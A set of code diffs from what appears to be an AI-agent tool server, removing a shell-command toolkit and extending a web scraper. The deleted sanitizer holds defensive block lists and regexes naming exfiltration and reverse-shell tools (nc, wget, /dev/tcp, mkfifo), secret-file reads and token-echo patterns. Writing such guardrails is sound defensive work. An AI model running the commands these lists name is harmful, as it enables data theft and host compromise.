"""Register example tools with the MCP server."""
@mcp.tool()
def example_tool(
message: str,
uppercase: bool = False,
repeat: int = 1,
) -> str:
"""
A simple example tool that processes text messages.
Use this tool when you need to transform or repeat text.
Args:
message: The message to process (1-1000 chars)
uppercase: If True, convert the message to uppercase
repeat: Number of times to repeat the message (1-10)
Returns:
The processed message string
"""
try:
# Validate inputs
if not message or len(message) > 1000:
return "Error: message must be 1-1000 characters"
if repeat < 1 or repeat > 10:
return "Error: repeat must be 1-10"
# Process the message
result = message
if uppercase:
result = result.upper()
# Repeat if requested
if repeat > 1:
result = " ".join([result] * repeat)
return result
except Exception as e:
return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
# File System Toolkits (post-consolidation)
This package now contains only the shell tool. **All file tools live in
`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
search_files, apply_patch) — they share one path policy and one home dir.
This package contains only sandbox path helpers used by `csv_tool` and
`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
write_file, edit_file, hashline_edit, search_files, apply_patch) — they
share one path policy and one home dir.
## Sub-modules
| Module | Description |
|--------|-------------|
| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
| `command_sanitizer.py` | Validates and sanitizes shell command strings |
| `security.py` | Sandbox path resolver still used by execute_command_tool |
| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |
## File tools
@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools
register_file_tools(mcp, home="/path/to/agent/home")
```
For shell:
```python
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
register_shell(mcp)
```
@@ -1,202 +0,0 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
"""Raised when a command is blocked by the safety filter."""
pass
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------
# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
_BLOCKED_EXECUTABLES: list[str] = [
# Network exfiltration
"wget",
"nc",
"ncat",
"netcat",
"nmap",
"ssh",
"scp",
"sftp",
"ftp",
"telnet",
"rsync",
# Windows network tools
"invoke-webrequest",
"invoke-restmethod",
"iwr",
"irm",
"certutil",
# User / privilege escalation
"useradd",
"userdel",
"usermod",
"adduser",
"deluser",
"passwd",
"chpasswd",
"visudo",
"net", # net user, net localgroup, etc.
# System destructive
"shutdown",
"reboot",
"halt",
"poweroff",
"init",
"systemctl",
"mkfs",
"fdisk",
"diskpart",
"format", # Windows format
# Reverse shell / code exec wrappers
"bash",
"sh",
"zsh",
"dash",
"csh",
"ksh",
"powershell",
"pwsh",
"cmd",
"cmd.exe",
"wscript",
"cscript",
"mshta",
"regsvr32",
# Credential / secret access
"security", # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
# rm with force/recursive flags targeting root or broad paths
re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
# del /s /q (Windows recursive delete)
re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
# dd writing to disks/partitions
re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
# chmod 777 / chmod -R 777
re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
# sudo — agents should never escalate privileges
re.compile(r"\bsudo\b", re.IGNORECASE),
# su — switch user
re.compile(r"\bsu\s+", re.IGNORECASE),
# ruby/perl with -e flag (inline code execution)
re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
# powershell encoded commands
re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
# Reverse shell patterns
re.compile(r"/dev/tcp/", re.IGNORECASE),
re.compile(r"\bmkfifo\b", re.IGNORECASE),
# eval / exec as standalone commands
re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
# Reading well-known secret files
re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
# Backtick or $() command substitution containing blocked executables
re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
# Environment variable exfiltration via echo/print
re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
# >& /dev/tcp (bash reverse shell)
re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]
# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
"""Extract the first token (executable) from a command segment.
Strips environment variable assignments (FOO=bar) from the front.
"""
segment = segment.strip()
# Skip env var assignments at the start: VAR=value cmd ...
tokens = segment.split()
for token in tokens:
if "=" in token and not token.startswith("-"):
continue
# Return lowercase for case-insensitive matching
return _normalize_executable_name(token)
return ""
def validate_command(command: str) -> None:
"""Validate a command string against the safety blocklists.
Args:
command: The shell command string to validate.
Raises:
CommandBlockedError: If the command matches any blocked pattern.
"""
if not command or not command.strip():
return
stripped = command.strip()
# --- Check full-command patterns ---
for pattern in _BLOCKED_PATTERNS:
match = pattern.search(stripped)
if match:
raise CommandBlockedError(
f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
f"If this is a false positive, please modify the command."
)
# --- Check each segment for blocked executables ---
segments = _SHELL_SPLIT_PATTERN.split(stripped)
for segment in segments:
segment = segment.strip()
if not segment:
continue
executable = _extract_executable(segment)
# Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
names_to_check = {executable}
if "." in executable:
names_to_check.add(executable.split(".")[0])
if names_to_check & set(_BLOCKED_EXECUTABLES):
matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
raise CommandBlockedError(
f"Command blocked for safety: '{matched}' is not allowed. "
f"Blocked categories: network tools, privilege escalation, "
f"system destructive commands, shell interpreters."
)
@@ -1,152 +0,0 @@
# Execute Command Tool
Executes shell commands within the secure session sandbox.
## Description
The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
## Use Cases
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
## Usage
```python
execute_command_tool(
command="npm install",
workspace_id="workspace-123",
agent_id="agent-456",
session_id="session-789",
cwd="project"
)
```
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `command` | str | Yes | - | The shell command to execute |
| `workspace_id` | str | Yes | - | The ID of the workspace |
| `agent_id` | str | Yes | - | The ID of the agent |
| `session_id` | str | Yes | - | The ID of the current session |
| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
## Returns
Returns a dictionary with the following structure:
**Success:**
```python
{
"success": True,
"command": "npm install",
"return_code": 0,
"stdout": "added 42 packages in 3s",
"stderr": "",
"cwd": "project"
}
```
**Command failure (non-zero exit):**
```python
{
"success": True, # Command executed successfully, but exited with error code
"command": "npm test",
"return_code": 1,
"stdout": "",
"stderr": "Error: Tests failed",
"cwd": "."
}
```
**Timeout:**
```python
{
"error": "Command timed out after 60 seconds"
}
```
**Error:**
```python
{
"error": "Failed to execute command: [error message]"
}
```
## Error Handling
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
## Security Considerations
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
## Examples
### Running a build command
```python
result = execute_command_tool(
command="npm run build",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="frontend"
)
# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
```
### Running tests with output
```python
result = execute_command_tool(
command="pytest -v",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
```
### Handling command failures
```python
result = execute_command_tool(
command="nonexistent-command",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
```
### Running git commands
```python
result = execute_command_tool(
command="git status",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="repo"
)
# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
```
## Notes
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
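Since the tool returns three distinct dict shapes (success, non-zero exit, error), a caller typically branches on them. A minimal sketch, assuming only the field names documented above (`summarize` is a hypothetical helper, not part of the tool):

```python
def summarize(result: dict) -> str:
    """Collapse the three documented result shapes into one message."""
    if "error" in result:
        # Timeout or execution failure: the command never completed.
        return f"tool error: {result['error']}"
    if result["return_code"] != 0:
        # Command ran but exited non-zero; stderr usually explains why.
        return f"command failed (exit {result['return_code']}): {result['stderr']}"
    return result["stdout"]

print(summarize({"success": True, "return_code": 0, "stdout": "ok", "stderr": ""}))
print(summarize({"error": "Command timed out after 60 seconds"}))
```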
@@ -1,3 +0,0 @@
from .execute_command_tool import register_tools
__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
"""In-process registry of long-running shell jobs spawned by
``execute_command_tool(run_in_background=True)``.
Jobs are keyed on a short id the tool returns to the agent. The agent
can then call ``bash_output(id=...)`` to poll for new output and
``bash_kill(id=...)`` to terminate. Each job is scoped to an
``agent_id`` so two agents sharing the same MCP server can't see or
kill each other's work.
The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
so a runaway process can't exhaust memory. Older bytes are dropped with
a one-time ``[truncated N bytes]`` marker prepended to the returned
text.
"""
from __future__ import annotations
import asyncio
import time
from collections import deque
from dataclasses import dataclass, field
from uuid import uuid4
# 64 KB rolling window per stream. Large enough for long build logs,
# small enough that a bash infinite loop can't OOM the MCP process.
_MAX_BUFFER_BYTES = 64 * 1024
@dataclass
class _RingBuffer:
"""Append-only byte buffer with a hard byte ceiling and per-read
offset tracking so each bash_output call only returns new bytes.
"""
max_bytes: int = _MAX_BUFFER_BYTES
# deque of (global_offset, bytes) chunks. global_offset is the total
# bytes written prior to this chunk; lets us compute "bytes since
# last poll" without copying.
_chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
_total_written: int = 0
_total_dropped: int = 0
_read_cursor: int = 0
def write(self, data: bytes) -> None:
if not data:
return
self._chunks.append((self._total_written, data))
self._total_written += len(data)
# Evict from the front until we're under the ceiling.
current_bytes = sum(len(c) for _, c in self._chunks)
while current_bytes > self.max_bytes and self._chunks:
dropped_offset, dropped = self._chunks.popleft()
self._total_dropped += len(dropped)
current_bytes -= len(dropped)
# Push the read cursor forward if the reader was still
# pointing at bytes we just evicted.
if self._read_cursor < dropped_offset + len(dropped):
self._read_cursor = dropped_offset + len(dropped)
def read_new(self) -> str:
"""Return any bytes since the last call, as decoded text.
Includes a ``[truncated N bytes]`` prefix if rolling-window
eviction dropped any bytes the reader hadn't yet consumed.
"""
chunks_out: list[bytes] = []
cursor = self._read_cursor
for offset, chunk in self._chunks:
end = offset + len(chunk)
if end <= cursor:
continue
start_in_chunk = max(0, cursor - offset)
chunks_out.append(chunk[start_in_chunk:])
cursor = end
self._read_cursor = cursor
raw = b"".join(chunks_out)
text = raw.decode("utf-8", errors="replace")
# Surface eviction ONCE per poll so the agent knows to check
# the file system for larger logs instead of assuming it's got
# the full output.
if self._total_dropped > 0 and text:
text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
return text
@dataclass
class BackgroundJob:
id: str
agent_id: str
command: str
cwd: str
started_at: float
process: asyncio.subprocess.Process
stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
_pump_task: asyncio.Task | None = None
exit_code: int | None = None
def status(self) -> str:
if self.exit_code is not None:
return f"exited({self.exit_code})"
if self.process.returncode is not None:
# Not yet surfaced by the pump but already finished.
return f"exited({self.process.returncode})"
return "running"
# agent_id -> {job_id -> BackgroundJob}
_jobs: dict[str, dict[str, BackgroundJob]] = {}
_jobs_lock = asyncio.Lock()
def _short_id() -> str:
return uuid4().hex[:8]
async def _pump(job: BackgroundJob) -> None:
"""Drain the child process's stdout/stderr into the ring buffers."""
proc = job.process
async def _drain(stream: asyncio.StreamReader | None, buf: _RingBuffer) -> None:
if stream is None:
return
while True:
chunk = await stream.read(4096)
if not chunk:
return
buf.write(chunk)
await asyncio.gather(
_drain(proc.stdout, job.stdout_buf),
_drain(proc.stderr, job.stderr_buf),
)
job.exit_code = await proc.wait()
async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
"""Start a subprocess in the background and register it. The caller
holds the job id returned from here and can poll via ``get()``.
"""
proc = await asyncio.create_subprocess_shell(
command,
cwd=cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
job = BackgroundJob(
id=_short_id(),
agent_id=agent_id,
command=command,
cwd=cwd,
started_at=time.time(),
process=proc,
)
# Start pumping IO in the background so the ring buffers stay warm
# even if the agent doesn't poll for a while.
job._pump_task = asyncio.create_task(_pump(job))
async with _jobs_lock:
_jobs.setdefault(agent_id, {})[job.id] = job
return job
async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
async with _jobs_lock:
return _jobs.get(agent_id, {}).get(job_id)
async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
"""SIGTERM a background job, escalating to SIGKILL after a grace
period. Returns a human-readable status string.
"""
job = await get(agent_id, job_id)
if job is None:
return f"no background job with id '{job_id}'"
if job.process.returncode is not None:
status = f"already exited with code {job.process.returncode}"
else:
try:
job.process.terminate()
except ProcessLookupError:
pass
try:
await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
status = f"terminated cleanly (exit={job.process.returncode})"
except TimeoutError:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
status = f"killed (SIGKILL, exit={job.process.returncode})"
# Deregister after kill so the id is no longer reachable.
async with _jobs_lock:
scope = _jobs.get(agent_id)
if scope is not None:
scope.pop(job_id, None)
return status
async def clear_agent(agent_id: str) -> None:
"""Test hook: kill every job owned by ``agent_id``."""
async with _jobs_lock:
scope = _jobs.pop(agent_id, {})
for job in scope.values():
if job.process.returncode is None:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
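The per-read cursor semantics of `_RingBuffer` can be shown in isolation. This is a simplified stand-alone copy (no dataclass, a deliberately tiny 8-byte ceiling so eviction triggers immediately), not the production class:

```python
from collections import deque

class TailBuffer:
    """Rolling tail buffer: keeps at most max_bytes; reads return only new bytes."""

    def __init__(self, max_bytes: int = 8):
        self.max_bytes = max_bytes
        self.chunks: deque[tuple[int, bytes]] = deque()  # (global_offset, data)
        self.dropped = self.written = self.cursor = 0

    def write(self, data: bytes) -> None:
        self.chunks.append((self.written, data))
        self.written += len(data)
        size = sum(len(c) for _, c in self.chunks)
        # Evict whole chunks from the front until under the ceiling,
        # advancing the read cursor past anything that was dropped.
        while size > self.max_bytes and self.chunks:
            off, old = self.chunks.popleft()
            self.dropped += len(old)
            size -= len(old)
            self.cursor = max(self.cursor, off + len(old))

    def read_new(self) -> bytes:
        out = []
        for off, chunk in self.chunks:
            end = off + len(chunk)
            if end <= self.cursor:
                continue  # already consumed on a prior poll
            out.append(chunk[max(0, self.cursor - off):])
            self.cursor = end
        return b"".join(out)

buf = TailBuffer()
buf.write(b"abcd")
print(buf.read_new())   # b'abcd'
buf.write(b"efghijkl")  # 12 bytes written total; 8-byte ceiling evicts "abcd"
print(buf.read_new())   # b'efghijkl' -- buf.dropped is now 4
```

The same mechanics, with a 64 KB ceiling and the `[truncated N bytes]` marker, give `bash_output` its "only new bytes since last poll" behavior.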
@@ -1,222 +0,0 @@
"""Shell command execution tool.
Three tools are registered:
* ``execute_command_tool`` runs a command synchronously with a per-call
timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
so the MCP event loop is not blocked while the child runs.
* ``bash_output`` polls a background job started with
``execute_command_tool(run_in_background=True)`` and returns any new
stdout/stderr since the last poll plus the current status.
* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
a 3-second grace period).
All three go through the same pre-execution safety blocklist in
``command_sanitizer.py``.
"""
from __future__ import annotations
import asyncio
import os
import time
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
# would cause every command to fail. 600s maximum (10 min) is the same
# ceiling Claude Code uses for its Bash tool; builds and test suites
# longer than that should use run_in_background instead.
_MIN_TIMEOUT = 1
_MAX_TIMEOUT = 600
_DEFAULT_TIMEOUT = 120
def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
agent_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
os.makedirs(agent_root, exist_ok=True)
if cwd:
return get_sandboxed_path(cwd, agent_id)
return agent_root
def register_tools(mcp: FastMCP) -> None:
"""Register command execution tools with the MCP server."""
@mcp.tool()
async def execute_command_tool(
command: str,
agent_id: str,
cwd: str | None = None,
timeout_seconds: int = _DEFAULT_TIMEOUT,
run_in_background: bool = False,
) -> dict:
"""
Purpose
Execute a shell command within the agent sandbox.
When to use
Run validators, linters, builds, test suites
Generate derived artifacts (indexes, summaries)
Perform controlled maintenance tasks
Start long-running processes via ``run_in_background=True``
(dev servers, watchers, file-triggered builds)
Rules & Constraints
No network access unless explicitly allowed
No destructive commands (rm -rf, system modification)
Commands are validated against a safety blocklist before
execution. Since commands still run through shell=True, the
blocklist only catches explicitly named nested shell executables.
timeout_seconds is clamped to [1, 600]. For longer-running
work use run_in_background=True + bash_output to poll.
Args:
command: The shell command to execute.
agent_id: The ID of the agent (auto-injected).
cwd: Working directory for the command (relative to the
agent sandbox). Defaults to the sandbox root.
timeout_seconds: Max wall-clock seconds the foreground
command is allowed to run. Ignored when
run_in_background=True. Default 120, max 600.
run_in_background: If True, spawn the command and return
immediately with a job id. Use bash_output(id=...) to
read output and bash_kill(id=...) to stop it.
Returns:
For foreground commands: dict with stdout, stderr, return_code,
elapsed_seconds.
For background commands: dict with id, pid, started_at, and
instructions for polling / killing the job.
On error: dict with an "error" key.
"""
try:
validate_command(command)
except CommandBlockedError as e:
return {"error": f"Command blocked: {e}", "blocked": True}
try:
secure_cwd = _resolve_cwd(cwd, agent_id)
except Exception as e:
return {"error": f"Failed to resolve cwd: {e}"}
if run_in_background:
try:
job = await spawn_job(command, secure_cwd, agent_id)
except Exception as e:
return {"error": f"Failed to spawn background job: {e}"}
return {
"success": True,
"background": True,
"id": job.id,
"pid": job.process.pid,
"command": command,
"cwd": cwd or ".",
"started_at": job.started_at,
"hint": (
"Background job started. Call "
f"bash_output(id='{job.id}') to read output, or "
f"bash_kill(id='{job.id}') to terminate it."
),
}
# Foreground path: clamp timeout, spawn, wait with a watchdog.
try:
timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
except (TypeError, ValueError):
timeout = _DEFAULT_TIMEOUT
started = time.monotonic()
try:
proc = await asyncio.create_subprocess_shell(
command,
cwd=secure_cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except Exception as e:
return {"error": f"Failed to execute command: {e}"}
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
except TimeoutError:
# Child is still running: kill it, drain what it already
# wrote so the agent gets a partial log, then report.
try:
proc.kill()
except ProcessLookupError:
pass
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
except Exception:  # deliberately broad; TimeoutError is a subclass
stdout_b, stderr_b = b"", b""
elapsed = round(time.monotonic() - started, 2)
return {
"error": (
f"Command timed out after {timeout} seconds. "
f"For longer work pass timeout_seconds (max 600) or "
f"run_in_background=True."
),
"timed_out": True,
"elapsed_seconds": elapsed,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
}
except Exception as e:
return {"error": f"Failed while running command: {e}"}
return {
"success": True,
"command": command,
"return_code": proc.returncode,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
"cwd": cwd or ".",
"elapsed_seconds": round(time.monotonic() - started, 2),
}
@mcp.tool()
async def bash_output(id: str, agent_id: str) -> dict:
"""Poll a background command for new output and its current status.
Returns any stdout/stderr bytes written since the last call.
The status is "running" or "exited(N)".
When the job has finished and all output has been consumed, it
is removed from the registry on the next poll.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
job = await get_job(agent_id, id)
if job is None:
return {"error": f"no background job with id '{id}'"}
new_stdout = job.stdout_buf.read_new()
new_stderr = job.stderr_buf.read_new()
return {
"id": id,
"status": job.status(),
"stdout": new_stdout,
"stderr": new_stderr,
"elapsed_seconds": round(time.time() - job.started_at, 2),
}
@mcp.tool()
async def bash_kill(id: str, agent_id: str) -> dict:
"""Terminate a background command.
Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
if the process is still alive. The job id is then deregistered.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
status = await kill_job(agent_id, id)
return {"id": id, "status": status}
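The timeout clamping described in the docstring is a small bounded coercion; in isolation it looks like this (a sketch mirroring the module's constants, standing alone):

```python
MIN_T, MAX_T, DEFAULT_T = 1, 600, 120  # same bounds as the module constants

def clamp_timeout(value) -> int:
    """Coerce a caller-supplied timeout into [1, 600], defaulting on junk."""
    try:
        return max(MIN_T, min(MAX_T, int(value)))
    except (TypeError, ValueError):
        return DEFAULT_T

print(clamp_timeout(0))      # 1   (a zero would make every command fail)
print(clamp_timeout(99999))  # 600 (10-minute ceiling)
print(clamp_timeout("abc"))  # 120 (unparseable -> default)
```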
@@ -10,12 +10,14 @@ Validates URLs against internal network ranges to prevent SSRF attacks.
from __future__ import annotations
import ipaddress
import json
import re
import socket
from typing import Any
from urllib.parse import urljoin, urlparse
from urllib.robotparser import RobotFileParser
from bs4 import BeautifulSoup
from bs4 import BeautifulSoup, NavigableString
from fastmcp import FastMCP
from playwright.async_api import (
Error as PlaywrightError,
@@ -82,6 +84,7 @@ def register_tools(mcp: FastMCP) -> None:
selector: str | None = None,
include_links: bool = False,
max_length: int = 50000,
offset: int = 0,
respect_robots_txt: bool = True,
) -> dict:
"""
@@ -94,12 +97,18 @@ def register_tools(mcp: FastMCP) -> None:
Args:
url: URL of the webpage to scrape
selector: CSS selector to target specific content (e.g., 'article', '.main-content')
include_links: Include extracted links in the response
max_length: Maximum length of extracted text (1000-500000)
include_links: When True, links are inlined as `[text](url)` in
content and also returned as a `links` list
max_length: Maximum length of extracted text returned in this call (1000-500000)
offset: Character offset into the extracted text. Use with
`next_offset` from a prior truncated result to paginate.
respect_robots_txt: Whether to respect robots.txt rules (default True)
Returns:
Dict with scraped content (url, title, description, content, length) or error dict
Dict with: url, final_url, title, description, page_type
(article|listing|page), content, length, offset, total_length,
truncated, next_offset, headings, structured_data (json_ld + open_graph),
and optionally links. On error, returns {"error": str, ...} with a hint when applicable.
"""
try:
# Validate URL
@@ -128,6 +137,7 @@ def register_tools(mcp: FastMCP) -> None:
"error": f"Blocked by robots.txt: {url}",
"url": url,
"skipped": True,
"hint": ("Pass respect_robots_txt=False if you have authorization to scrape this site."),
}
except Exception:
pass # If robots.txt can't be fetched, proceed anyway
@@ -195,7 +205,17 @@ def register_tools(mcp: FastMCP) -> None:
return {"error": "Navigation failed: no response received"}
if response.status != 200:
return {"error": f"HTTP {response.status}: Failed to fetch URL"}
hint = (
"Site likely requires auth, blocks bots, or is rate-limiting."
if response.status in (401, 403, 429)
else "Resource may not exist or server may be down."
)
return {
"error": f"HTTP {response.status}: Failed to fetch URL",
"url": url,
"status": response.status,
"hint": hint,
}
content_type = response.headers.get("content-type", "").lower()
if not any(t in content_type for t in ["text/html", "application/xhtml+xml"]):
@@ -218,63 +238,176 @@ def register_tools(mcp: FastMCP) -> None:
# Parse rendered HTML with BeautifulSoup
soup = BeautifulSoup(html_content, "html.parser")
base_url = str(response.url) # Final URL after redirects
# Extract structured data BEFORE noise removal — JSON-LD lives
# in <script>, which gets decomposed below. JSON-LD is often the
# cleanest source of structured info on listing pages.
json_ld: list[Any] = []
for script in soup.find_all("script", type="application/ld+json"):
raw = script.string or script.get_text() or ""
if raw.strip():
try:
json_ld.append(json.loads(raw))
except (json.JSONDecodeError, TypeError):
pass
open_graph: dict[str, str] = {}
for meta in soup.find_all("meta"):
prop = (meta.get("property") or "").strip()
if prop.startswith("og:"):
val = (meta.get("content") or "").strip()
if val:
open_graph[prop[3:]] = val
# Remove noise elements
for tag in soup(["script", "style", "nav", "footer", "header", "aside", "noscript", "iframe"]):
tag.decompose()
# Get title and description
# Get title and description (fall back to OG description)
title = soup.title.get_text(strip=True) if soup.title else ""
description = ""
meta_desc = soup.find("meta", attrs={"name": "description"})
if meta_desc:
description = meta_desc.get("content", "")
description = meta_desc.get("content", "") or ""
if not description:
description = open_graph.get("description", "")
# Target content
# Headings outline (capped) — lets the agent drill in via selector
headings: list[dict[str, Any]] = []
for h in soup.find_all(["h1", "h2", "h3", "h4", "h5", "h6"]):
h_text = h.get_text(strip=True)
if h_text:
headings.append({"level": int(h.name[1]), "text": h_text})
if len(headings) >= 100:
break
# Page-type heuristic: many <article> blocks → listing page
article_count = len(soup.find_all("article"))
if article_count >= 3:
page_type = "listing"
elif article_count == 1 or soup.find("main"):
page_type = "article"
else:
page_type = "page"
# Locate target subtree
if selector:
content_elem = soup.select_one(selector)
if not content_elem:
return {"error": f"No elements found matching selector: {selector}"}
text = content_elem.get_text(separator=" ", strip=True)
return {
"error": f"No elements found matching selector: {selector}",
"url": url,
"hint": "Try a broader selector or omit selector to use auto-detection.",
}
else:
# Auto-detect main content
main_content = (
soup.find("article")
or soup.find("main")
# Prefer <main> over the first <article> — on listing pages
# the latter would drop every article after the first.
content_elem = (
soup.find("main")
or soup.find(attrs={"role": "main"})
or soup.find("article")
or soup.find(class_=["content", "post", "entry", "article-body"])
or soup.find("body")
)
text = main_content.get_text(separator=" ", strip=True) if main_content else ""
# Clean up whitespace
text = " ".join(text.split())
# Collect link metadata BEFORE rewriting anchors (rewriting
# replaces <a> elements with NavigableStrings, so find_all('a')
# would miss them after).
links: list[dict[str, str]] = []
if content_elem and include_links:
for a in content_elem.find_all("a", href=True)[:50]:
link_text = a.get_text(strip=True)
href = urljoin(base_url, a["href"])
if link_text and href:
links.append({"text": link_text, "href": href})
# Truncate if needed (reserve 3 chars for the ellipsis so the
# final string stays within max_length)
if len(text) > max_length:
text = text[: max_length - 3] + "..."
text = ""
if content_elem:
# Inline anchors as [text](url) so links survive text
# extraction (otherwise the agent has to correlate `links`
# against the text blob).
if include_links:
for a in content_elem.find_all("a", href=True):
link_text = a.get_text(strip=True)
if link_text:
href = urljoin(base_url, a["href"])
a.replace_with(NavigableString(f"[{link_text}]({href})"))
# Convert <br> and block elements into newlines so the output
# preserves paragraph/list/heading structure rather than
# collapsing into one giant whitespace-joined string.
for br in content_elem.find_all("br"):
br.replace_with(NavigableString("\n"))
block_tags = (
"p",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"li",
"tr",
"div",
"section",
"article",
"blockquote",
)
for block in content_elem.find_all(block_tags):
block.insert_before(NavigableString("\n"))
block.append(NavigableString("\n"))
raw_text = content_elem.get_text(separator=" ")
# Normalize: squash spaces within each line, collapse runs of
# blank lines to a single blank, trim.
cleaned: list[str] = []
blank = True # swallow leading blanks
for line in raw_text.split("\n"):
line = re.sub(r"[ \t]+", " ", line).strip()
if line:
cleaned.append(line)
blank = False
elif not blank:
cleaned.append("")
blank = True
text = "\n".join(cleaned).strip()
# Apply offset/truncation with continuation metadata. Reserve 3
# chars for the ellipsis so the returned string stays within
# max_length (back-compat with existing test expectations).
total_length = len(text)
offset = max(0, min(offset, total_length))
end = offset + max_length
truncated = end < total_length
sliced = text[offset:end]
if truncated and len(sliced) >= 3:
sliced = sliced[:-3] + "..."
structured_data: dict[str, Any] = {}
if json_ld:
structured_data["json_ld"] = json_ld
if open_graph:
